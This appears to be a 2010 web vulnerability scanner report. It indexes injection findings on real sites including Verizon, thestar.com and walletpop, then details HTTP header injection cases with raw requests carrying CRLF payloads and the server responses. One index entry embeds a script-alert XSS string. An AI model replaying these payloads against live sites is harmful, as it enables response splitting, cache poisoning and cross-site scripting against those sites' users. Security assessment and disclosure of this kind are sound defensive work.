2.772. http://www.thestar.com/ScriptResource.axd [REST URL parameter 1]

2.773. http://www.thestar.com/WebResource.axd [REST URL parameter 1]

2.774. http://www.thestar.com/includes/headerweather [REST URL parameter 1]

2.775. http://www.thestar.com/includes/headerweather [REST URL parameter 2]

2.776. http://www.thestar.com/searchresults [REST URL parameter 1]

2.777. http://www.thestar.com/searchresults [q parameter]

2.778. http://www.thestar.com/searchresults [q parameter]

2.779. http://www.toronto.com/restaurants/listing/000-225-233/ [REST URL parameter 1]

2.780. http://www.toronto.com/searchResults [q parameter]

2.781. http://www.toronto.com/searchResults [q parameter]

2.782. http://www.truste.org/ivalidate.php [sealid parameter]

2.783. http://www.typepad.com/services/toolbar [autofollowed parameter]

2.784. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 1]

2.785. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 2]

2.786. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 3]

2.787. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 4]

2.788. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [REST URL parameter 5]

2.789. http://www.verizon.net/central/bookmark [WT.ti parameter]

2.790. http://www.verizon.net/central/bookmark [channel parameter]

2.791. http://www.verizon.net/central/bookmark [clientid parameter]

2.792. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter]

2.793. http://www.verizon.net/central/bookmark [q parameter]

2.794. http://www.verizon.net/central/bookmark [web_search_type parameter]

2.795. https://www.verizon.net/ssowebapp/VOLPortalLogin [clientId parameter]

2.796. http://www.verizonwireless.com/b2c/store/controller [action parameter]

2.797. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]

2.798. http://www.verizonwireless.com/b2c/store/controller [item parameter]

2.799. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]

2.800. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]

2.801. http://www.walletpop.com/ [name of an arbitrarily supplied request parameter]

2.802. http://www.walletpop.com/blog/category/consumer-ally/ [REST URL parameter 3]

2.803. http://www.walletpop.com/blog/category/consumer-ally/ [REST URL parameter 3]

2.804. http://www.walletpop.com/blog/category/consumer-ally/ [name of an arbitrarily supplied request parameter]

2.805. http://www.walletpop.com/blog/category/consumer-ally/ [name of an arbitrarily supplied request parameter]

2.806. http://www.wltx.com/news/story.aspx [name of an arbitrarily supplied request parameter]

2.807. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [bgc parameter]

2.808. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [fc parameter]

2.809. http://www.zoomerang.com/Survey/Poll/WEB22BDWQ9U9RV [width parameter]

2.810. http://www2.manheim.com/signup/step_one [language_selected parameter]

2.811. https://www2.manheim.com/login/forgot_password [language_selected parameter]

2.812. https://www2.manheim.com/login/forgot_username [language_selected parameter]

2.813. https://www2.manheim.com/signup/step_one [language_selected parameter]

2.814. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [branding parameter]

2.815. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [lang parameter]

2.816. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [makeTransition parameter]

2.817. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [name of an arbitrarily supplied request parameter]

2.818. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [referringSite parameter]

2.819. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

2.820. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

2.821. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

2.822. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">450552b46bf parameter]

2.823. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

2.824. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [REST URL parameter 3]

2.825. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

2.826. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [goto parameter]

2.827. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

2.828. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]

2.829. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [bannerid parameter]

2.830. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter]

2.831. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx [FlowRoute parameter]

2.832. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Account/MyAccountOverview.aspx [name of an arbitrarily supplied request parameter]

2.833. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter]

2.834. https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx [ihaweb parameter]

2.835. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter]

2.836. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [UIDPWD parameter]

2.837. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [WTNOnly parameter]

2.838. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

2.839. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]

2.840. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [REST URL parameter 3]

2.841. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]

2.842. https://www22.verizon.com/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter]

2.843. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter]

2.844. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter]

2.845. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [ref parameter]

2.846. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter]

2.847. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [Target parameter]

2.848. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter]

2.849. https://www22.verizon.com/myverizon/ [goto parameter]

2.850. https://www22.verizon.com/myverizon/ [goto parameter]

2.851. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [REST URL parameter 4]

2.852. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [name of an arbitrarily supplied request parameter]

2.853. https://www36.verizon.com/FiOSVoice/members/CallsandMessages.aspx [REST URL parameter 2]

2.854. https://www36.verizon.com/FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx [REST URL parameter 2]

2.855. https://www36.verizon.com/FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx [REST URL parameter 2]

2.856. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [aspxerrorpath parameter]

2.857. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [aspxerrorpath parameter]

2.858. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [name of an arbitrarily supplied request parameter]

2.859. http://www.googleadservices.com/pagead/aclk [Referer HTTP header]

2.860. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]

2.861. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]

2.862. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]

2.863. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]

2.864. http://surround.verizon.net/ [POPLocation cookie]

2.865. http://surround.verizon.net/ [POPLocation cookie]

2.866. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]

2.867. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]

2.868. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie]

2.869. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie]

2.870. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie]

2.871. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie]

2.872. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie]

2.873. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie]

2.874. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie]

2.875. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie]

2.876. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie]

2.877. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie]

2.878. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie]

2.879. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

2.880. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]

2.881. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]

2.882. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]

2.883. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]

2.884. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]

2.885. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]

2.886. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]

2.887. http://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

2.888. http://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]

2.889. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]

2.890. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]

2.891. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]

2.892. http://www22.verizon.com/Residential/FiOSTV/Plans/ [VzApps cookie]

2.893. http://www22.verizon.com/Residential/FiOSTV/Plans/ [dotcomsid cookie]

2.894. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [dotcomsid cookie]

2.895. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzapps cookie]

2.896. http://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [vzapps cookie]

2.897. http://www22.verizon.com/Residential/HighSpeedInternet [vzapps cookie]

2.898. http://www22.verizon.com/Residential/HighSpeedInternet/ [VzApps cookie]

2.899. http://www22.verizon.com/Residential/HighSpeedInternet/ [vzapps cookie]

2.900. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [VzApps cookie]

2.901. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/ [vzpers cookie]

2.902. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

2.903. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]

2.904. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]

2.905. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]

2.906. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]

2.907. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]

2.908. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]

2.909. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]

2.910. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]

2.911. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]

2.912. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]

2.913. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]

2.914. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]

2.915. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/ [VzApps cookie]

2.916. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]

2.917. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]

2.918. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]

2.919. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [vzpers cookie]

2.920. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [vzpers cookie]

2.921. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]

2.922. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]

2.923. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [VzApps cookie]

2.924. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]

2.925. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]

2.926. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]

2.927. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]

2.928. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]

2.929. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]

2.930. http://www22.verizon.com/Residential/Services/ [vzapps cookie]

2.931. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie]

2.932. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie]

2.933. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie]

2.934. http://www22.verizon.com/Residential/TV/ [vzapps cookie]

2.935. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]

2.936. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]

2.937. http://www22.verizon.com/Residential/aboutFiOS/ [VzApps cookie]

2.938. http://www22.verizon.com/Residential/aboutFiOS/ [dotcomsid cookie]

2.939. http://www22.verizon.com/Residential/aboutFiOS/Features/ [VzApps cookie]

2.940. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

2.941. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]

2.942. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]

2.943. http://www22.verizon.com/Residential/aboutFiOS/labs/ [VzApps cookie]

2.944. http://www22.verizon.com/Residential/aboutFiOS/labs/ [dotcomsid cookie]

2.945. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

2.946. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]

2.947. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]

2.948. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

2.949. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]

2.950. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]

2.951. http://www22.verizon.com/Residential/aboutFiOS/widgets/ [VzApps cookie]

2.952. http://www22.verizon.com/Residential/aboutFiOS/widgets/ [dotcomsid cookie]

2.953. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

2.954. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]

2.955. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]

2.956. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]

2.957. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]

2.958. http://www22.verizon.com/residential/internet [vzapps cookie]

2.959. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie]

2.960. http://www22.verizon.com/residentialhelp [ECSPCookies cookie]

2.961. http://www22.verizon.com/residentialhelp [vzapps cookie]

2.962. http://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]

2.963. http://www22.verizon.com/residentialhelp/ [vzapps cookie]

2.964. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]

2.965. http://www22.verizon.com/residentialhelp/phone [vzapps cookie]

2.966. https://www22.verizon.com/Residential/DirecTV/ [VzApps cookie]

2.967. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie]

2.968. https://www22.verizon.com/Residential/FiOSInternet/ [dotcomsid cookie]

2.969. https://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]

2.970. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie]

2.971. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [dotcomsid cookie]

2.972. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [VzApps cookie]

2.973. https://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [dotcomsid cookie]

2.974. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]

2.975. https://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]

2.976. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]

2.977. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [dotcomsid cookie]

2.978. https://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [VzApps cookie]

2.979. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]

2.980. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [dotcomsid cookie]

2.981. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [VzApps cookie]

2.982. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [dotcomsid cookie]

2.983. https://www22.verizon.com/Residential/TV/ [VzApps cookie]

2.984. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

2.985. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]

2.986. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

2.987. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]

2.988. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

2.989. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]

2.990. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

2.991. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]

2.992. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzapps cookie]

2.993. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzpers cookie]

2.994. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [ECSPCookies cookie]

2.995. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [VzApps cookie]

2.996. https://www22.verizon.com/residentialhelp/ [ECSPCookies cookie]

2.997. https://www22.verizon.com/residentialhelp/ [VzApps cookie]



1. HTTP header injection  next
There are 11 instances of this issue:

Issue background


HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://50.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 914c0%0d%0a5ae8a0d6760 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx&914c0%0d%0a5ae8a0d6760=1 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:31:19 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=0cb9eb0e-696a-22c8-5249-00007193de3f; expires=Fri, 18-Feb-2011 03:31:19 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspx?914c0
5ae8a0d6760
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.2. http://50.xg4ken.com/media/redir.php [url[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://50.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload 4c016%0d%0a04bb2c362b6 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx4c016%0d%0a04bb2c362b6 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:31:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=555531e9-31c0-9dc9-aa49-0000346e4fb7; expires=Fri, 18-Feb-2011 03:31:16 GMT; path=/; domain=.xg4ken.com
Location: http://www.perpetual.com.au/investors.aspx4c016
04bb2c362b6

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.3. http://vulnerable.verizon.host/adi/N2870.vznbiz/B3160296 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N2870.vznbiz/B3160296

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 65bc6%0d%0a7e707f3a9da was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /65bc6%0d%0a7e707f3a9da/N2870.vznbiz/B3160296;sz=300x300;ord=2139185137? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/65bc6
7e707f3a9da
/N2870.vznbiz/B3160296%3Bsz%3D300x300%3Bord%3D2139185137:
Date: Sun, 21 Nov 2010 22:29:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://vulnerable.verizon.host/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ae7c8%0d%0a3218649ce4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifae7c8%0d%0a3218649ce4b?1290207264971902 HTTP/1.1
Accept: */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifae7c8
3218649ce4b
:
Date: Fri, 19 Nov 2010 22:57:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://amch.questionmarket.com/adscgen/st.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload b8b0f%0d%0a3bcadb1b34c was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=725650&site=48495972&code=39005743&randnum=4312221 HTTP/1.1
Accept: */*
Referer: http://www.yelp.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: amch.questionmarket.com
Proxy-Connection: Keep-Alive
Cookie: CS1=39341243-52-1; ES=b8b0f%0d%0a3bcadb1b34c

Response

HTTP/1.1 302 Found
Date: Sat, 20 Nov 2010 03:43:44 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Fri, 20-Nov-2009 03:43:43 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=39341243-52-1_725650-1-1; expires=Tue, 10-Jan-2012 19:43:44 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=b8b0f
3bcadb1b34c
_725650-8zSjM-0; expires=Tue, 10-Jan-2012 19:43:44 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=725650&site=5-48495972-&code=39005743
Content-Length: 0
Content-Type: text/html


1.6. http://amch.questionmarket.com/adscgen/st.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 32c9e%0d%0a01ddaa8666 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=725650&site=48495972&code=32c9e%0d%0a01ddaa8666&randnum=4312221 HTTP/1.1
Accept: */*
Referer: http://www.yelp.com/
Accept-Language: en-US
